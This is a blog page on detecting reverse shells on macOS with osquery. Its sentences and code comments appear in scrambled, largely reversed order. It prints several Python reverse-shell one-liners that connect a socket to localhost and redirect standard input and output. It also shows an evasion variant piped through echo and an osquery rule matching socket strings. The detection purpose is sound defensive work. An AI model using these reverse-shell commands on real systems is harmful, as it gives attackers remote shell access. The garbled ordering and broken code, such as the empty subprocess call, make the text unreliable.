4/2/2023 0 Comments Osquery macos![]() One thing nearly all reverse shells have in common is that they don’t attach to a TTY. ![]() As an exercise to understand how this works better, try removing one of those file descriptors and run the shell to see how the behavior changes without STDIN, STDOUT, or STDERR. Without redirecting the I/O, the output of your commands would remain local to the host. # Duplicate STDERR (fd=2) to our socket file descriptor and close the original os. # Duplicate STDIN (fd=1) to our socket file descriptor and close the original os. # Duplicate STDOUT (fd=0) to our socket file descriptor and close the original os. # Initiate a connection to a remote IP address s. # Build a socket that will be used for the outbound connection s =socket. # Import the libraries needed to make network connections and execute processes import socket ,subprocess ,os Let’s analyze the Python reverse shell and break it down into these components: A (preferably native) utility to combine all of the former elements.A method of redirecting stdin/stdout/stderr.A method for establishing an outbound network connection. ![]() A shell to execute commands (usually /bin/sh or /bin/bash).When I began researching potential detection techniques for reverse shells, I started by breaking down a reverse shell into a set of basic components. ![]() They could also just put the contents into a file and run it: $ python reverse_shell.py. Running the command in this fashion would cause the resulting process command line arguments just appear as “python”, thus breaking our detection rule. For example, they could echo the command and pipe it to python (a technique that is employed heavily by Empyre): echo 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("127.0.0.1",8888)) os.dup2(s.fileno(),0) ' | python` However, this detection rule can be easily evaded by an attacker. Path = /System/Library/Frameworks/amework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonĬmdline = python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("127.0.0.1",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call() Using osquery, we could write a detection rule that might look something like: osquery> SELECT * FROM processes WHERE cmdline LIKE '%AF_INET,socket.SOCK_STREAM%' I wanted to find a detection technique that would be fairly comprehensive, hard to avoid, and would trigger few false positives.įor example, the following command can be used to initiate a reverse shell using Python: $ python -c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("127.0.0.1",5555)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call() ' Writing detection rules around the command line arguments feels clumsy and is easily circumvented. As you might expect, there are numerous ways to initiate these connections using native utilities such as: The benefits of this are well documented here. Once attackers gain a foothold on systems, they frequently like to gain shell access by launching reverse shells. While it may be convenient for developers, it provides attackers with a variety of methods for establishing persistence and bootstrapping connections to command and control servers. One challenge when it comes to building defenses for MacOS are the numerous scripting languages that come pre-installed with the operating system.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |